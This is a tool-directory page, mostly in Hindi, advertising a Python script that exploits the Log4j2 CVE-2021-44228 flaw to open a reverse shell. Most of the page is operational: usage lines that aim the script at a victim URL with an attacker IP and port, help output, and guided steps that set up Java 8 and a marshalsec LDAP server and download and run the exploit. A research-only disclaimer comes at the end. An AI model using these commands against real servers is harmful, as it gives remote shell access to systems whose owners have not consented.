Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4j2-CVE-2021-44228-revshell — Log4j2 CVE-2021-44228 revshell, बेशक यह बेकार है!! | Kitploit
उपकरण/GitHubGitHub/faisalfs10x/log4j2-cve-2021-44228-revshell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubfaisalfs10x/log4j2-cve-2021-44228-revshell

Log4j2-CVE-2021-44228-revshell

Log4j2 CVE-2021-44228 revshell, बेशक यह बेकार है!!

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
18224 साल पहलेअभी तक समीक्षित नहीं
साझा करें

Log4j2-CVE-2021-44228-revshell

उपयोग

For reverse shell:
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

For check exploitable:
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

$~  python3 Log4j2-revshell.py -h
    usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT
                              [-hp HTTPPORT] [-V]

    Log4j2 CVE-2021-44228 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -M MODE, --mode MODE  Mode: check | rev
      -u TARGET, --target TARGET
                            Target full URL, http://www.victimLog4j.xyz:8080
      -l LHOST, --lhost LHOST
                            Attacker IP for receive revshell
      -p LPORT, --lport LPORT
                            Attacker port for receive revshell
      -hp HTTPPORT, --httpport HTTPPORT
                            HTTP server port on attacker host, default is 8888
      -V, --version         show program's version number and exit

आवश्यकताएँ

1. Marshalsec jndi.LDAPRefServer # यहाँ देखें, https://github.com/mbechler/marshalsec
2. Java 8 # आप Java 8 यहाँ प्राप्त कर सकते हैं https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html, 
   सुझाव है कि jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181] इंस्टॉल करें
3. This script, Log4j2-revshell.py

TLDR; मार्गदर्शित चरण

$ ब्राउज़र खोलें और Java 8 डाउनलोड करें https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
  Java SE Development Kit 8u181 अनुभाग में, अपने OS के अनुसार jdk-8u181-linux-x64.tar.gz या उपयुक्त पैकेज चुनें।
    
$ sudo mkdir /usr/lib/jvm # यदि आपके पास अभी तक यह निर्देशिका नहीं है तो बनाएँ
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz # डाउनलोड किए गए jdk-8u181-linux-x64.tar.gz को /usr/lib/jvm में निकालें
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version # सत्यापित करें कि आप Java 1.8.0_181 चला रहे हैं

$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir # marshalsec jndi.LDAPRefServer इंस्टॉल करें
$ sudo apt install -y maven # marshalsec को Java बिल्डर maven के साथ बनाएँ। यदि आपके पास maven नहीं है, तो कृपया पहले इंस्टॉल करें
$ mvn clean package -DskipTests # maven के साथ marshalsec टूल बनाएँ 
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py

$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

PoC

लक्ष्य होस्ट: http://192.168.5.122:8080
आक्रमणकारी होस्ट: 192.168.5.120

https://user-images.githubusercontent.com/51811615/146068317-23af25f4-9e5b-42bb-960b-6775edd5be03.mp4

परीक्षित किया गया

- Ubuntu 18.04

अस्वीकरण:

यह स्क्रिप्ट केवल सुरक्षा विश्लेषण और अनुसंधान के लिए है, इसलिए यदि इसका उपयोग अवैध गतिविधियों के लिए किया जाता है तो मैं उत्तरदायी नहीं होऊँगा।
टूल डाउनलोड करें